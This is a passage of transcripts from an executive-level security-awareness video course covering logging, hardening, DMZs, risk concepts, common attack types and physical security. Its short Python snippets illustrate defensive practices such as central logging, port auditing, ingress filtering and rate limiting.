accounts. By users having their own logon credential set that isn't shared with other users, we have a way to track which activities were performed by which person, and so we have accountability for actions. We can also be selective about the events that we want to audit. Instead of auditing all events, we can be much more judicious in our choices so that we'll only be notified of items that actually have relevant impact. We can also store audit logs on a central logging host.
This way, if a device or a host containing audit logs itself is compromised, and
those logs are wiped or they're tampered with, well, we've got another central
location where we've got a copy of those. And often, that central logging host is
very much hardened, so protected from attack, and it's also stored on a protected
network.
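As a small illustration of the central logging best practice, here is a Python sketch that keeps a local copy of audit events and forwards another copy to a remote syslog collector; the collector's address is a placeholder and assumes a syslog listener on UDP port 514.

import logging
import logging.handlers

logger = logging.getLogger("app-audit")
logger.setLevel(logging.INFO)

# Keep a local copy of audit events
logger.addHandler(logging.FileHandler("app-audit.log"))

# Also forward each event to a hardened central logging host (placeholder address)
central = logging.handlers.SysLogHandler(address=("loghost.example.com", 514))
logger.addHandler(central)

logger.info("Failed sign-in for user jchavez from 1.1.1.1")

Because every event lands in two places, wiping the local log on a compromised host doesn't erase the audit trail.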
[Video description begins] Vulnerability Scanning/Penetration Testing [Video
description ends]
Vulnerability scanning is considered passive, because what we're doing is scanning
a host or a range of IP addresses or an entire subnet looking for weaknesses.
However, when weaknesses are identified, that is as far as it goes. Normally,
vulnerability scanning won't cause a service disruption. Probably the worst thing
that could result from conducting a vulnerability scan would be setting off alarms.
Because you're scanning devices as a malicious user might do during the
reconnaissance phase of hacking. So we can set off alarms, we should be aware of
that.
Penetration testing is a different beast altogether because it's considered active.
Because it not only can identify weaknesses, but it actually takes steps in an
attempt to exploit those weaknesses. And depending on the weakness in question, it
can actually cause a service disruption for a specific system. So it's important then
that when we are conducting penetration testing, either through internal or external
security auditors, that specific pen test dates and times are set, so that we know
when this is going to happen. You probably don't want a live, active penetration
test against a crucial business system during the height of when that system is
required for business productivity.
[Video description begins] Multifactor Authentication [Video description ends]
Multi-factor authentication, or MFA, uses at least two authentication categories
such as something you know, perhaps like a user name and a password. Those are two separate items, but they're both in only one category, something you know, along with something you have. Maybe that would be in the form of a smartphone where you're being sent a unique code. And the combination of having the phone and the code sent to it, along with the name and password, will allow you into the system. So
multi-factor authentication then is certainly more difficult to crack than if we were
using single factor authentication, such as simply knowledge of the user name and
password.
Creating an incident response plan begins with first identifying what it is that we
want to be able to effectively respond against in terms of realized threats against an
asset. So we have to identify critical systems and/or data. Then we have to look at
what the likelihood is of threats against those systems and data actually occurring.
Then we need to identify and mitigate, ideally remove single points of failure. Then
we need to assemble a team that will be part of the incident response plan that will
know their roles and responsibilities when certain incidents occur. And finally, we
can go ahead and create the plan. Incident response planning is crucial in today's technological environments, which are growing so vast and complex, and at the same time face so many possible threats against them.
An Executive's Guide to Security:
Understanding Security Threats
Companies that do not understand threats facing their information are at risk of
costly data breaches. In this 13-video course, learners can explore common security
threats, types of network attacks, and the human element of security threats. Key
concepts covered here include what an attack surface is, and how it must be
understood to protect corporate information; and what network hardening is and
how it relates to protection of corporate information. Next, learners will examine
network demilitarized zones and how they protect corporate information; observe
differences between threats, vulnerabilities, and risks in corporate environments;
and study top kinds of security threats facing organizations today. Continue by
learning the role that physical security plays in protecting corporate data; how
social engineering is conducted and how it is mitigated through corporate policy;
and the importance of corporate security policies, and why they should be strictly
adhered to. Finally, explore the importance of password policies and why they
should be adhered to; and learn reasons why IT administrators need to protect an
organization by refusing to bend rules.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Jamie Campbell. With almost 25 years under my belt as an IT consultant,
marketing and communications expert and professional writer, I'm a technology
enthusiast with a passion for gadgets and a flair for problem solving. I've worked in
the IT, publishing and automotive industries and I'm also an accomplished web
designer.
Additionally, I've been a technology instructor, I write for various tech blogs, and
I've authored and published four novels. Breaches of company information are
reported on a regular basis. And it has never been more important that companies
protect their information. Organizational leaders must lead the charge.
But it's often a challenge to understand the risks and security principles designed to
keep an organization safe. Companies that don't understand the threats facing their
information are at risk of costly data breaches.
In this course I'll discuss a variety of common security threats, the different types of
network attacks, the role physical security plays in the protection of corporate data,
and the human element of security threats.
Understanding the Attack Surface
[Video description begins] Topic title: Understanding the Attack Surface. Your host
for this session is Jamie Campbell. [Video description ends]
In this video I'll discuss what an attack surface is and how it must be understood in
order to protect corporate information. You may have heard the term attack surface
or the term attack vector and these two terms generally define, for network
administrators, a network's vulnerability.
When we speak about attack surface, what we're describing is the total combined
nodes, users, devices and any entry points of a software environment, network
environment and business environment. In other words, the attack surface
represents all possible vulnerabilities for a network. To better understand the attack
surface, it helps to visualize what it might look like.
[Video description begins] A diagram displays illustrating an example of an attack
surface. The diagram is arranged in three concentric rings. The inner ring shows
an office, a system of nodes, and a server. The middle ring has routers, a system of
nodes, and servers. The outer ring shows servers, a system of nodes, mobile
devices, laptops, and applications. [Video description ends]
We have many different ways to access company network information today,
beginning with the internal servers and workstations. Those have been around for a
while now. But we have other vectors, and that's the other term you need to know,
with each vector increasing the size and scope of an attack surface. This can
include things like remote workers and remote offices, apps and data in the Cloud,
devices that employees use in the course of business, so phones and tablets. Each
new attack vector presents a risk and a challenge, and IT administrators need to
ensure that these vectors are secure in order to protect a network.
As I mentioned, there are several kinds of attack vectors and they can be broken
into lots of categories. For the sake of simplifying things, let's break them down
into four general categories. First is software. Software is an absolute necessity for
getting work done. But its risk lies in the fact that there's an almost unlimited number of vendors creating an almost unlimited number of applications. While companies have learned over the years to lock down what users can and cannot install inside a company's firewall, things have gotten more complicated in the past 10 years or so.
The network of course, is an attack vector. It's how hackers and unauthorized users
try to gain access to the information secured behind the firewall. Mobile devices are
the new threat really, because while administrators can relatively easily define what software users can and cannot install, it becomes significantly more difficult
to control what apps are installed on phones and tablets if those devices are
personal devices that employees use to connect to the company network.
And then there's the physical attack vector which for the sake of simplification
represents every door, server room, wireless router, network access point and
internal computer connected to a company network.
Generally attacks come in two forms. The first is passive where a hacker monitors a
network's activity and scans for vulnerabilities on that network. Because it's just
watching and not actively trying to penetrate that network, it's not always obvious
that they're there. The purpose of this kind of attack is to recon the network and its
activity often with the intent of developing an attack plan.
Active attacks on the other hand go further with hackers actually gaining access to
and perhaps modifying information either by burrowing in through a vulnerability,
an attack vector, or intercepting information that comes into and goes out of the network.
So why is the attack surface such a problem for organizations? Well, the surface
has been growing for a while now thanks to advances in technology. 20 years ago,
you had servers and workstations, internal network access points, and that was
pretty much your attack surface. Today, we have numerous new kinds of entry
points, like wireless routers, for example. We have new kinds of devices that
connect to an organizational network, tablets and phones, for example.
In addition to all that, we're seeing more sophisticated hacking tools. There are
actually tool kits that you can purchase on the dark web, making it relatively easier
for people who aren't hardcore hackers. And new kinds of exploits, the tricks and
methods used by hackers to gain access. Then there's BYOD, bring your own
device. Many companies have realized that it's next to impossible to stop people
from bringing their personal phones and tablets to work.
And, in fact, they recognized an opportunity to give those devices connectivity for two
basic reasons. First, because it saves money, now that's up for debate, but I won't
get into that here. You don't have to give them a work phone is the basic idea.
Second, it can add to productivity because employees won't be tethered to their
desks. However, as I've discussed, personal devices have greatly increased the
attack surface. Especially when employees don't pay much attention to the apps
they're installing.
Network Hardening Explained
[Video description begins] Topic title: Network Hardening Explained. Your host
for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of network hardening and how it relates to
the protection of corporate information. So what is network hardening? Well, it's
lots of things, but let's start with a quick definition of attack surface because we
need to understand that and why networks are vulnerable. An attack surface is all
the nodes, users, devices and entry points, all the vulnerabilities of a software
network and business environment. It's every potential entry point for a hacker.
In network hardening, we utilize multiple techniques to ensure that the network is
as secure as possible, minimizing the risk associated with all the entry points. This is a multitiered procedure using techniques like strong password policies, ensuring the software is secured, patching software vulnerabilities, securing network ports, utilizing intrusion prevention systems, having strong malware detection software and hardware, dealing with stale and outdated accounts, and reducing the amount of unnecessary software and services. Essentially, you're hardening the network's
defenses by mitigating the common attack vectors and having active defenses
against attacks.
Some of the common holes in a network that we target for network hardening
include open network ports. Network ports are used for communicating in a
network, both internally inside the network and externally out to the Internet. For
example, when you use a web browser to surf the Web, you're using port 80 or port
443, the latter being for secure encrypted connections.
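To make the open-ports idea concrete, here is a minimal Python sketch that checks whether a handful of well-known TCP ports are accepting connections on a host; the host name and the port list are placeholders an admin would adjust, and this should only be run against systems you're authorized to test.

import socket

host = "server01.example.com"         # placeholder host to audit
ports_to_check = [22, 80, 443, 3389]  # example well-known ports

for port in ports_to_check:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(2)
        is_open = sock.connect_ex((host, port)) == 0  # 0 means the connection succeeded
        print(f"Port {port}: {'open' if is_open else 'closed or filtered'}")

Any port that shows as open but isn't tied to a needed service is a candidate for closing as part of network hardening.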
Different kinds of software use different ports and many of them are for legitimate
uses. Then there's old or discontinued software. This represents a sizable challenge
for network admins because we sometimes need old legacy software, and
organizations often move slowly to update to newer software, operating systems,
for example. The problem is compounded when you're talking about hundreds or
thousands of systems in an organizational network. Same with unpatched software.
There used to be a time not long ago when you waited for the next release of an
application or OS, and it could be months or even longer.
Now, depending on the vendor, we're seeing software updates on a weekly basis for
a couple of reasons. First, bandwidth allows us to do that, but more than that,
software development isn't perfect. And vendors, when they detect new
vulnerabilities or security risks want to get the patches out to their installed base as
soon as possible. But there also has to be a procedure to ensure that new software
patches don't break functionality.
Recently, a major software developer pushed out an update to its OS and within a
matter of days, some frustrated users were reporting that the update had deleted
their personal files. That's an extreme example but it did happen and organizations
often want to test an update to make sure that it won't disrupt employees in their
work activities. And another common hole is Wi-Fi routers.
Wi-Fi has been with us in a useful manner for 20 years or so. And add to that the
sheer number of wireless devices that people bring to work, and you have a
headache for admins. Not just that, but many organizations offer guest Wi-Fi for
visitors to their business. So that represents a major attack vector that needs to be
part of the network hardening process.
Generally, there have to be two basic roles in the network hardening process. The
first is the admins, the people who actually perform the hardening. They identify
security holes in a number of ways, ranging from the very obvious, like locking
down unused network ports, and installing firewalls and malware detectors. To
more active and aggressive forms of network hardening. One of those methods is
something called penetration testing or pen testing for short. Pen tests are
simulations of hacking attacks where IT professionals actively try to break into a
network to identify security gaps and lock them up.
On the other hand, there's a group that IT admins sometimes forget about as a way of helping to secure a network: the users. Some admins may regard users as the problem, but users are on the front line. They're in the trenches every day doing
recon if you will. So they're a valuable resource because if they're properly trained
to recognize potential security gaps, they can advise an admin when they detect a
problem. This kind of advocacy is important but not all organizations recognize the
importance of keeping their employees informed and making them realize that they
have a vested interest in protecting the network too.
Now let's focus for a moment on other issues surrounding network hardening,
specifically some of the things that good network admins want to keep on top of
and employees need to be aware of.
The first is something called zero-day vulnerabilities or simply zero-day. This
refers to a phenomenon where a security hole exists, but the people who need to
know about that potential exploit, the software developers, the security people and
the admins, aren't aware of it. This is when the clock starts ticking, thus zero-day, when a hacker, if they were aware of the hole, could walk right in, so to speak, because the hole is there and no one knows about it.
Virus definitions, these are updated all the time because of things like zero-day
exploits where security companies recognize a new virus or a potential hole and
release updates to close the holes. Antivirus software definitions need to be updated
regularly for this very reason.
Software bloat, have you ever purchased a new computer or a phone and found all
sorts of software on it that you didn't ask for? It could be a free trial of antivirus
software. It could be a free trial of some sort of marketplace. I'm sure you've come
across it because it's everywhere. Software bloat is a phenomenon that can
represent a real network hardening problem, because network admins don't want to deal with all sorts of software they didn't ask for. It can bog down the system, and most of us don't have the time to assess each application to ensure that it
doesn't pose a security risk. Software bloat is a thing.
Poor password policy, this is a headache for everyone. People hate having difficult
to remember passwords, and they hate having to remember yet another password.
But trust me, there's a good reason for strong password policies. Long gone is the
time when you could enter five or six numbers for a password and expect the
account to be safe from things like brute force attacks, which use sheer CPU power
to repeatedly try passwords until the correct password's been found.
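The brute force point can be made with simple arithmetic. Here is a short Python sketch comparing the search space of a six-digit numeric password with a twelve-character password drawn from the full set of printable characters; the guess rate is an assumed figure purely for illustration.

# Search-space comparison for brute force attacks (illustrative numbers)
guesses_per_second = 1_000_000_000  # assumed attacker capability

six_digit_pin = 10 ** 6    # digits only, length 6
mixed_12_chars = 94 ** 12  # printable ASCII characters, length 12

for label, space in [("6-digit password", six_digit_pin),
                     ("12-character mixed password", mixed_12_chars)]:
    seconds = space / guesses_per_second
    print(f"{label}: {space:.3e} combinations, ~{seconds:.3e} seconds to exhaust")

The difference of many orders of magnitude is the entire rationale behind strong password policies.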
And I'll end with the attack surface, and the sheer amount of new attack vectors.
This represents a big issue for security admins because where we used to have one
device for every employee, a desktop or a laptop computer. We now have two,
three, four, devices for every employee with each one connecting to the
organizational network. We're seeing this kind of exponential growth in the number
of possible attack points. And that makes network hardening even more difficult,
and more important in the here and now.
What is a Demilitarized Zone?
[Video description begins] Topic title: What is a Demilitarized Zone? Your host for
this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss network demilitarized zones and how they can help protect
corporate information. You may have heard the term demilitarized zone or DMZ.
And when we talk about DMZs we're not talking about soldiers from opposing
nations putting a safe boundary between them, where no activity occurs. But that's
where the term comes from. So what is a network demilitarized zone?
Well in networking, a demilitarized zone is a logical space or gap between the entry
point to a network, the firewall facing the outside world, and the network itself. The
idea is to provide a barrier between the outside world and an organization's
sensitive information.
This is a basic graphic that helps explain what a DMZ is and how it works. On the
left-hand side we have the outside world, the Internet, including a phone to represent
external devices, even if they're physically present in the building. Then we have
the cloud and the laptop to represent remote users. Just to the right of that group
there's the firewall, the guardian of the network. You have to get through that in
order to access a company's network. On the far right we have the internal network,
the LAN, with servers and workstations that are physically plugged in to the
network. Notice that there's a firewall just to the left of that as well, and that space in the middle is the DMZ. There are the Wi-Fi routers and servers. In this example, one is for email and one is for a web server. And here we have file
folders with arrows showing the flow of traffic in two directions. So this area in the
middle provides access for users and that could be company personnel working
remotely. It could be suppliers, could be customers. They have access to certain
things. The customers, for example, wouldn't be able to access that mail server, but
maybe they can access your website there in the DMZ.
But all the sensitive information, the important stuff to an organization is secured
behind that second firewall, the one on the right. There's no specific rule that states
what you can and cannot put in the DMZ. More often than not, it's common sense.
It's just a matter of deciding what and how much you want to put in the DMZ.
Because while it's still secured by a firewall, it is directly accessed by the outside
world, that is the Internet. A DMZ is also known as a perimeter network because it
provides a sort of perimeter.
Generally speaking, DMZs can be physical or logical, meaning that you could
cordon off a DMZ to a separate physical location or have the perimeter set up on
the same servers. Essentially it's a barrier that makes it more difficult for attackers
to gain access to sensitive information. And it separates the untrusted, the Internet,
from the trusted, the internal network, the LAN.
Now here's another way of looking at DMZs. We have the Internet, which is, and rightly so, untrusted, but it's also necessary to do business in the modern world. We need to be able to access that Internet. We need to be able to give others access via the Internet. On the other hand, you have your network, which is a trusted place where all your important information is stored. Sometimes, though, it needs to be accessed from the outside, by employees who travel, for example.
We need to be able to provide them access to what they require in order to do their
jobs. So the DMZ acts as a space in the middle that can satisfy that need without
putting the network on the right at risk from the network on the left. As I
mentioned, it's up to whomever designs the DMZ to determine what kind of access
is provided.
[Video description begins] Let's look at the Demilitarized Zone Common
Services. [Video description ends]
Generally, you'd have website access and access to email. FTP, the File Transfer Protocol, is usually a common service on a DMZ. Database access might be provided, and services like VoIP, Voice over IP, could be placed on a DMZ.
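To make those zone-to-zone rules concrete, here's a minimal sketch in Python. The zone names, services, and allowed flows are illustrative assumptions on my part, not a real firewall configuration.

```python
# A toy model of DMZ segmentation rules, not a real firewall configuration.
# Zone names and the services allowed on each flow are illustrative assumptions.
ALLOWED = {
    ("internet", "dmz"):      {"https", "smtp", "ftp", "sip"},  # public-facing services live in the DMZ
    ("dmz", "internal"):      {"smtp"},                         # e.g. mail relay only, tightly scoped
    ("internal", "dmz"):      {"https", "smtp", "ftp"},         # staff reach DMZ services
    ("internal", "internet"): {"https"},                        # outbound browsing
}

def is_allowed(src_zone, dst_zone, service):
    """Return True if traffic for 'service' may flow from src_zone to dst_zone."""
    return service in ALLOWED.get((src_zone, dst_zone), set())

print(is_allowed("internet", "dmz", "https"))       # True: the public web server sits in the DMZ
print(is_allowed("internet", "internal", "https"))  # False: nothing goes straight from the Internet inside
```

The point of the sketch is simply that traffic from the outside world terminates in the DMZ; nothing passes straight from the untrusted side to the internal LAN.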
Threats vs. Vulnerabilities vs. Risks
[Video description begins] Topic title: Threats versus Vulnerabilities versus Risks.
Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll describe the difference between threats, vulnerabilities, and risks
in a corporate environment. When we talk about network security, especially in
organizational environments like a company network, there are three terms we tend to use to lay out the problem so we can figure out how to tackle it. Those terms are threats, vulnerabilities, and risks.
And there's a distinction between the three that every stakeholder needs to understand, if we're to help them see why it's so important to protect an organization's information from outside risks. I find this diagram helps to pare down the terms. We really have two elements to be concerned with, threats and vulnerabilities. Where they intersect is where the third element, risk, lies.
Understanding that relationship on an organizational scale will help create a culture
of risk prevention.
[Video description begins] A graphic displays. It shows a Venn diagram depicting
the relation between the threat and vulnerability. The point of intersection is
denoted by risk. [Video description ends]
So, threats are the potential sources of danger, the things that we network admins worry about every day. Vulnerabilities, on the other hand, are the potential things that can be exploited, the security holes that we need to identify and close. And the risk is the asset that can be lost or compromised if A, the threat, leverages B, the vulnerability, to get to that asset.
Threats come in many forms, they can be intentional, so your proverbial hacker
trying to find a way into your network. They can also be unintentional, so, for
example, an employee that does something that causes harm. I'll use the example of
failing to lock a computer at the end of the day. They can come in the form of
natural disasters, earthquakes, hurricanes, thunderstorms, and so on.
And they could be the result of force majeure, things that occur either through some
sort of error or at random like power outages. Some examples of vulnerabilities
include security policies, which are great to have, but only as good as the policy
itself. Security infrastructure could give hackers an opening if it hasn't been properly established; the classic example is a backdoor, whether intentional or unintentional.
The backup policy, which is crucial for disaster planning. If you're not backing up
your data on a regular basis, there's a vulnerability there, because lost information
costs. Whether an organization has a disaster plan. Has every contingency been
thought through? You have to be ready for everything.
And then there's how to deal with ex-employees, whether they left voluntarily or involuntarily. How do you go through and scrub the footprint that they left behind?
That could be security codes, passes, email accounts, network access accounts and
so on, and so on. And all that takes us to risk, the result of threats times
vulnerabilities.
[Video description begins] Risk Explained [Video description ends]
Risk requires thorough assessment and planning. Every company understands risk,
or at least it should, but how well an organization understands and deals with risk
often comes down to planning and teams. Ask yourself this, in the event of a
disaster, intentional or otherwise, does every person in your organization know how
to react, or will they be hobbled sitting and waiting for someone to tell them how to
react?
That in no small part comes down to policy. If it hasn't been written down in a clear
and unambiguous manner, there may be a problem. On the coattails of that is the
fact that things change, particularly in the tech world. And a policy is not and
should never be a document that's signed off on and then placed in the cabinet to
collect dust. It's a living, breathing document that needs to be revised on an
ongoing basis.
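One common way to make "risk is the result of threats times vulnerabilities" concrete is a simple likelihood-times-impact scoring exercise. Here's a hedged sketch in Python; the scale and the register entries are illustrative assumptions on my part, not prescriptions.

```python
# A hedged sketch of "risk = threats times vulnerabilities" expressed as a simple
# likelihood/impact scoring exercise. The 1-5 scale and the example entries are
# illustrative assumptions only.
def risk_score(likelihood, impact):
    """Both inputs on a 1-5 scale; a higher product means a higher priority."""
    return likelihood * impact

register = [
    # (scenario,                        likelihood, impact)
    ("Unpatched web server exploited",  4,          5),
    ("Lost unencrypted laptop",         3,          4),
    ("Power outage at head office",     2,          3),
]

for name, likelihood, impact in sorted(register, key=lambda r: risk_score(r[1], r[2]), reverse=True):
    print(f"{risk_score(likelihood, impact):>2}  {name}")
```

Sorting by that product gives you a rough prioritization you can feed back into planning and policy.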
Top Security Threats
[Video description begins] Topic title: Top Security Threats. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the top kinds of security threats facing organizations
today. There are lots of threats to a company's information and we have plenty of
real world examples of that. But there are specific threats worth considering
because these are currently the top security threats to organizations, so let's take a
look.
We start with Malware, a catch-all term that upon closer examination means much
more. Social engineering is a term that refers to using people to gain access.
Unpatched software is an ongoing threat. And then there's BYOD, bring your own
device and its younger sibling IoT, the Internet of Things.
Generally speaking, these are the top four security threats to organizations today.
As I said, Malware is a catch-all, a broad term that refers to software designed to do
bad things, in some cases to compromise systems and steal information.
But Malware is also used to cause mayhem and do damage. It's always at the
top of the list because Malware grows and gets more dangerous as hackers learn
new tricks. Social engineering is used by hackers to build relationships with people
on the inside or take advantage of a situation where people are involved.
Sometimes it's employees who unwittingly give up information. Sometimes it's
methods that hackers use to take advantage of a situation.
And there's a methodology to it too, dumpster diving, where a hacker goes through
an organization's trash to find information that may help him gain access to a
network. Or shoulder surfing where someone looking over your shoulder might
glean a password or account name. Social engineering can get quite sophisticated
perhaps taking months or longer. Software that goes unpatched represents a real threat.
Zero-day exploits appear and the clock begins to tick. Someone identifies a flaw in a piece of software, for example, and while that flaw remains unpatched, it is a threat. Or, in the case of many organizations, they have a working system and don't want to mess with it. So they stay with, say, Windows 7, or a piece of software that's three generations old.
BYOD and IoT are relatively new. They've only been with us for 10 or 15 years
really, if you're speaking about bring your own device. They represent a risk
because these devices can connect wirelessly to an organization's network. And security for mobile devices isn't always as strong as you need.
People bring their own devices, and companies let them connect because it's
convenient. Maybe it's cost effective, and it may make employees more efficient
because they don't have to be tethered to their desks to get work done. But these
devices could pose a real headache when they contain sketchy software or even
worse, actual Malware.
And the Internet of Things is even newer with devices that didn't previously
connect having connectivity now. Televisions and other electronic devices,
refrigerators even. And while there is a convenience factor to these devices, what
we're seeing is that the thousands of vendors who manufacture them don't always
or equally spend a lot of time thinking about security. And that poses a threat to
organizations that use them.
Types of Attacks
[Video description begins] Topic title: Types of Attacks. Your host for this session
is Jamie Campbell. [Video description ends]
In this video I'll discuss the common types of security attacks and how they pose a
risk to organizational information. Knowledge is power, that phrase has stood the
test of time and has serious implications in a world where information travels so
freely. We IT professionals always have to be aware of the next threat or kind of
attack because by understanding them, we can build defenses against them.
However, how much information do employees have about the attacks that can cripple a company or put it at great financial risk? People are generally aware of
some of the buzzwords like virus, but they don't intuitively understand how they're
packaged and delivered.
And that presents a risk for companies that don't properly train their personnel in
the things to look for. So let's dig into it. Virus, Trojan, and Worm, terms that most
people have heard. These three are the unholy triad of malware. Generally they are
small programs that can attach themselves to legitimate programs. Sometimes
they're stand-alone processes that have been installed when a user clicks something they shouldn't have. And some malware, like worms, is designed to spread itself across a computer network. Whatever the methodology, the purpose is always malicious. They could be used to spy quietly without the user
being aware of them. They can lock files and systems, encrypting them so a user
can't gain access. They can cause mayhem, destroying files or entire file systems,
and they can spread themselves exponentially to widen the damage.
Another common kind of attack, and I use the word attack loosely because these aren't necessarily actively enacted, are clickjacking and URL spoofing. Clickjacking is a method used to hijack clicks on websites, thus the name. It takes advantage of vulnerabilities on a webpage to trick users into clicking invisible links. URL spoofing creates what appears to be a legitimate page from a legitimate company, except that it's not legitimate. Someone has gone to great lengths to duplicate your bank's website, for example, and then tricks you into going there, perhaps through a URL that looks like, but is not exactly, the spelling of the bank's URL. Why do hackers use clickjacking and URL spoofing? There are several possible reasons. They could want to earn money off advertising. So in the case of clickjacking, if you click on something that's actually an ad, they're getting the money off of it; that's the best case scenario.
Often these methods are used to steal information or even infect the system. IP
Spoofing is another common kind of attack. In IP spoofing, an attacker hides their
actual IP address and tricks another system into thinking that the IP address is a
trusted one. So why use IP spoofing? Well, it can trick another system into
accepting it as trusted. Internal network IP addresses, for example, have a certain numerical format, and firewalls are configured to allow addresses using that format. If you can trick a system by saying, hey, I'm one of you, I'm one of the team, then you can begin to cause mayhem.
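As a small illustration of how a perimeter device pushes back on spoofed internal addresses, here's a hedged sketch of ingress filtering in Python. The private ranges are the standard RFC 1918 blocks; the interface logic is an assumption for illustration only.

```python
# A minimal sketch of ingress filtering: packets arriving on the external interface
# should never claim an internal (private) source address. The ranges below are
# the standard RFC 1918 private blocks; everything else is illustrative.
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def looks_spoofed(src_ip, arrived_on_external):
    """Flag traffic that claims an internal source but arrived from outside."""
    src = ipaddress.ip_address(src_ip)
    claims_internal = any(src in net for net in INTERNAL_NETS)
    return arrived_on_external and claims_internal

print(looks_spoofed("192.168.1.50", arrived_on_external=True))   # True: drop it
print(looks_spoofed("203.0.113.10", arrived_on_external=True))   # False: a plausible external source
```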
Phishing and spear phishing are a common method of fishing for information about a potential target, thus the name, except with P-H at the beginning instead of an F. Commonly, this is done through email, but it has been used in social
engineering, and it's spread to SMS and other kinds of messaging systems now that
they're more prevalent. And spear phishing is a more sophisticated and therefore
dangerous form of phishing. It's more targeted often using personal information
about the recipient calling them by name, sending them a message as if it was a
known and trusted sender. Both kinds of phishing are used to get information about
a target. And that could range from someone pretending to be from IT looking to
confirm a password to obtaining information about account information, and more.
So they're very dangerous types of attacks.
Brute force attacks sound scary because they can be. In a brute force attack, a computer throws processing power at a problem; it keeps trying a password over and over again, guessing until it gets it right. Now, this has become more of a problem because back in the day, computers simply weren't fast enough to work through all the conceivable combinations. But computers have gotten exponentially more powerful, and that's why you see greater emphasis on password complexity.
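To put some rough numbers behind that, here's a back-of-the-envelope sketch in Python. The guesses-per-second figure is an assumption on my part, not a benchmark.

```python
# Rough arithmetic behind "longer, more complex passwords resist brute force".
# The guesses-per-second figure is an illustrative assumption, not a benchmark.
GUESSES_PER_SECOND = 10_000_000_000  # 10 billion/s, roughly an offline GPU attack

def seconds_to_exhaust(alphabet_size, length):
    """Worst-case time to try every combination of the given length."""
    return alphabet_size ** length / GUESSES_PER_SECOND

print(seconds_to_exhaust(10, 6))                       # 6 digits: ~0.0001 seconds
print(seconds_to_exhaust(62, 8) / 3600)                # 8 letters and digits: a matter of hours
print(seconds_to_exhaust(95, 12) / (3600 * 24 * 365))  # 12 printable characters: ~1.7 million years
```

Even at these made-up rates, adding length and character variety moves cracking time from a fraction of a second to geological timescales.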
The man in the middle attack is where a hacker sits in between two parties, say for
example, two people sharing an email conversation.
[Video description begins] Why Man-in-the-Middle? [Video description ends]
The man in the middle attack could be used passively to gain sensitive information,
say about a client, a company, account information, you name it. Or it can even be used actively to modify the information being transmitted. So, for example, the
hacker receives the email, modifies the information in it, and then sends it along to
the intended recipient.
Keyloggers are small pieces of malware that capture keyboard input. Their purpose
is of course pretty obvious. Someone can intercept account information, passwords,
and other sensitive information because every keystroke is silently captured and
transferred. Everyone knows spam, and no one loves it. But in my experience, most
people don't understand why much of the spam we get can be dangerous. Often it's
nonsensical and obvious in the scam it represents, but it can and does come in
many forms. Through emails, telephone, and messaging systems.
Spam can be dangerous in all kinds of ways. The obvious stuff, the prince looking to get his money out of the country, I think most people are wise to. But spammers have gotten more sophisticated, often tricking people into clicking links, opening
attachments and things like that. But they can herald other things too. For example,
bogging down servers as the buildup to an attack happening elsewhere. Spam can
be pretty insidious and everyone in an organization needs to be spam literate.
[Video description begins] Spam can be very dangerous (with included links) or
deceptive (to draw focus away from something else) [Video description ends]
And then there's Denial-of-Service, DoS, and Distributed-Denial-of-Service,
DDoS. In this kind of attack, a system or systems keep accessing an IP address
thousands of times a second with the intent of choking the system. These attacks can be pretty damaging, and the most nefarious ones in history have cost the targeted companies a great deal of money in downtime, lost business, and upgrading equipment to mitigate future such attacks.
[Video description begins] DDoS is particularly dangerous because it comes from
multiple sources, usually unknowing bot computers, with a primary focus of
disabling a site. [Video description ends]
But DDoS in particular is problematic because of the distributed part, the first D. In such attacks the hacker uses unsuspecting computers, users who clicked the wrong link or opened the wrong attachment, installing bot software, something called a command and control, or C&C, bot. When the hijacker has a sufficient number of bots, collectively known as a botnet, they can instruct those systems to bombard their target.
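Application-level throttling is only one small piece of the picture, but as an illustration, here's a toy per-source rate limiter in Python. The window and threshold are illustrative assumptions; real DDoS mitigation happens upstream in CDNs, scrubbing services, and network gear.

```python
# A toy illustration of per-source request throttling, one small piece of the
# flood-mitigation picture. Real DDoS defenses sit upstream, not in code like this.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0
MAX_REQUESTS = 100                # illustrative per-source limit per window

recent = defaultdict(deque)       # source IP -> timestamps of recent requests

def allow(source_ip, now=None):
    """Return False once a source exceeds the per-window request budget."""
    now = time.monotonic() if now is None else now
    q = recent[source_ip]
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()               # discard requests that fell out of the window
    if len(q) >= MAX_REQUESTS:
        return False              # over the limit: drop or challenge this request
    q.append(now)
    return True
```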
Physical Security
[Video description begins] Topic title: Physical Security. Your host for this session
is Jamie Campbell. [Video description ends]
In this video, I'll discuss the role physical security plays in the protection of
corporate data. I think we all know, practically speaking, what physical security means, but there's a bit of nuance when we talk about physical network security. It's all the tangible things that protect a company's information: from locked doors, to the servers, to the nodes on a network, that is, all the PCs plugged into a network port, to the network hubs throughout a building, to the network ports themselves.
And the physical footprint is large, spanning a great deal of area. Particularly if
you're talking about a company that has physical locations in different geographical
areas. It includes buildings, rooms inside those buildings, and warehouses and other
ancillary locations. But it goes deeper. It includes any tangible thing that can be
read or removed, printed documents, calendars and rolodexes and printed reports.
And yes, it could include any computer, connected device, access point, either
wired or wireless and servers.
So, why worry about it? We have locks, security guards, what's the big deal? Well,
first, locks can be broken if they're used at all. People tend to trust a visitor,
especially if they don't know that someone wandering down the hallway is a visitor.
One method of social engineering is to enter a secure building close behind
someone working there. They swipe their security pass, and the hacker enters along
with them. It has happened, the hacker can now wander around the building
looking for exploits. And as long as they're acting like they belong there, it's rare that an employee would confront them.
And here's the other thing. Locks are great when they're used. I like the adage that
we don't lock doors inside our houses. A few years ago, I heard a colleague
discussing the time they wandered into an empty office in their building. No one
was occupying the office and it was unlocked. But there on the floor was a wireless
router plugged into an Ethernet port, so plugged into the network. The problem was
that the company had a policy of securing the locations where wireless routers were
located, keeping them in locked cabinets.
My colleague unplugged the router and logged a security incident. Because it's
quite possible someone wandered into this empty office and plugged in to the
